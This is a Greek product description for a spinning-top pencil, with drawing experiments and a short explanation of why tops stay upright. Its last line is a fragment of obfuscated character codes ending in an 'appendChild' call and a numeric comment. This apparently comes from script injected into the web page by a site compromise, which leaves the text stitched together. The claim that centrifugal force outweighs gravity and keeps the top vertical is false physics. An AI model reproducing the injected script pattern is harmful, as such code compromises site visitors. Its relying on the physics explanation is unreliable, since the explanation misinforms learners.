30313_Stimmung

30313 Σβούρα-μολύβι

Όταν μια σβούρα περιστρέφεται γρήγορα, ασκείται φυγόκεντρος δύναμη. Η φυγόκεντρος είναι πιο ισχυρή από τη βαρύτητα και έτσι η σβούρα μένει κάθετη κατά την περιστροφή. Ζωγραφίζει καλύτερα με ξυσμένη μύτη. Για να ευχαριστηθείτε περισσότερο καιρό την σβούρα-μολύβι, μπορείτε να την αντικαταστήσετε ή να την ξύσετε. Περιέχει ανταλλακτικές μύτες. Η συσκευασία περιλαμβάνει συναρπαστικές πληροφορίες.

Οι σβούρες είναι ένα από τα πιο παλιά παιχνίδια στον κόσμο. Είναι τέλειες για να δοκιμάσεις τις ικανότητές σου!

Όταν παίρνεις μια σβούρα ανάμεσα στον αντίχειρα και τον δείκτη και την περιστρέφεις με μια γρήγορη κίνηση, δεν ξέρεις ποτέ τι θα συμβεί. Θα μείνει σε ένα σημείο ή θα περιστρέφεται σε όλο τον χώρο;

Αυτήν την απρόβλεπτη κίνηση χρησιμοποιούσαν παλιά για να προβλέψουν το μέλλον. Η μύτη της σβούρας σχεδίαζε μοτίβα στα οποία μπορούσαν να διαβάσουν το μέλλον.

Πώς γίνεται;

Πάρτε ένα φύλλο χαρτί και στρίψτε τη σβούρα. Όσο πιο γρήγορα τη στρίψετε, τόσο πιο σταθερή θα είναι και τόσο περισσότερο θα στρέφεται πάνω στο χαρτί. Αν η μύτη της σβούρας είναι πολύ μυτερή, η σβούρα θα στρέφεται στο ίδιο σημείο και πιθανώς να σχεδιάσει μόνο μια τελεία. Όσο περισσότερο αφήνετε τη σβούρα να στρέφεται, τόσο θα φθείρεται η μύτη της. Με τι θα μοιάζει το αριστούργημά σας όταν η μύτη θα φθαρεί ή θα σπάσει; Κάντε το πείραμα!

Τι θα συμβεί αν τοποθετήσετε τη σβούρα με κλίση και την στρέψετε μετά;

Μπορείτε επισης να τοποθετήσετε το φύλλο χαρτί πάνω σε ένα κομμάτι χαρτόνι και να σηκώσετε ελαφρά το χαρτόνι όσο κινείται η σβούρα. Τι ίχνη αφήνει τώρα η σβούρα πίσω της;

Μα πώς γίνεται;

Πρώτα απ’όλα, στην σβούρα ασκείται η δύναμη της έλξης της γης, που ονομάζεται βαρύτητα. Η βαρύτητα είναι η δύναμη που μας κρατάει, εμάς και όλα τα πράγματα, στο έδαφος. Αν τοποθετήσετε απλά τη σβούρα κάθετα σε μια επιφάνεια, χωρίς να τη στρίψετε, θα πέσει, εξαιτίας αυτής της δύναμης.

Αλλά μόλις η σβούρα γυρίσει με μεγάλη ταχύτητα, ασκείται η φυγόκεντρος που είναι πιο δυνατή από την βαρύτητα. Γι’αυτό η σβούρα μένει σε κάθετη θέση κατά τη διάρκεια της περιστροφής. Μόνο όταν μειώνεται η ταχύτητα της περιστροφής ή αγγίξει κάποιος τη σβούρα θα αρχίσει να τρεμοπαίζει και στο τέλος θα σταματήσει.

Γνωρίζετε ότι…

Οι σβούρες παίζουν σημαντικό ρόλο στις επιστήμες γιατί χάρη σε αυτές μπορούμε να μελετήσουμε πολλές αρχές της φυσικής. Το 1984 εκδόθηκε ακόμα και ένα βιβλίο πολλών εκατοντάδων σελίδων για τη «θεωρία της σβούρας».

7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/